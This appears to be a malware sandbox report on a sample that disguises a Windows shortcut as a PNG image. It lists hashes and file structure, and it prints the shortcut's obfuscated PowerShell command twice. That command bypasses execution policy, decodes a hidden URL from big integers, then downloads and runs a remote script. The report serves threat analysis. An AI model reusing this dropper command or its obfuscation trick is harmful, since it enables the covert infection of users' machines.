Malicious
Malicious
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
7e148b9c4728a2ca898202909b1dac75
Sha1
fa1262ffa59463696064df3917697755ded125c5
Sha256
6af7dd257139760f999bee998bce1ab3a7a8200a5d2e3567832e10851664f583
Sha384
879f4baf4410cf4b52f4916c59bf124e320e362b0734e622c908edf4212c59405de514aac5353da84797d4fd5b7040ef
Sha512
4803cd8df18cd7ce5dd4f97afabe0484c9f5d6e949114b8276534d201fe333345df8c8f20cc0b53f0ace4f0850bfc3afcd75e349a309bddf9c49dfbb055d58c5
SSDeep
96:eiLui3IZqXrTGYcQgBdTqqMnPfxJJozXoIV16pAZ+r5IN8ze9l+fW:zLJ3BOYfkdT5MnPZsz4e4IE+
TLSH
41A18E19D099F25BF0076F3EAB28B363A17E61FC854D05478E202563947D1E8850F486
File Structure
7e148b9c4728a2ca898202909b1dac75
Malicious
MP-123967297.mp4
IMG-937160996.png.lnk
Malicious
LNK CommandLine
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe -ep bypass -c "$e=[bigint]\"110645999827489966577018689937773874017511\";$i=[bigint]\"68970090462973912201637040235194953174135\";$n=$e - $i;while($n -ne 0){$z+=[char]([int]($n -band 128+127));$n=$n -shr 8};iwr $z -OutFile $env:TEMP\nQCEWNx.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\nQCEWNx.ps1"
7e148b9c4728a2ca898202909b1dac75 (4.79 KB)
File Structure
7e148b9c4728a2ca898202909b1dac75
Malicious
MP-123967297.mp4
IMG-937160996.png.lnk
Malicious
LNK CommandLine
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe -ep bypass -c "$e=[bigint]\"110645999827489966577018689937773874017511\";$i=[bigint]\"68970090462973912201637040235194953174135\";$n=$e - $i;while($n -ne 0){$z+=[char]([int]($n -band 128+127));$n=$n -shr 8};iwr $z -OutFile $env:TEMP\nQCEWNx.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\nQCEWNx.ps1"

Malicious

7e148b9c4728a2ca898202909b1dac75 > IMG-937160996.png.lnk
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙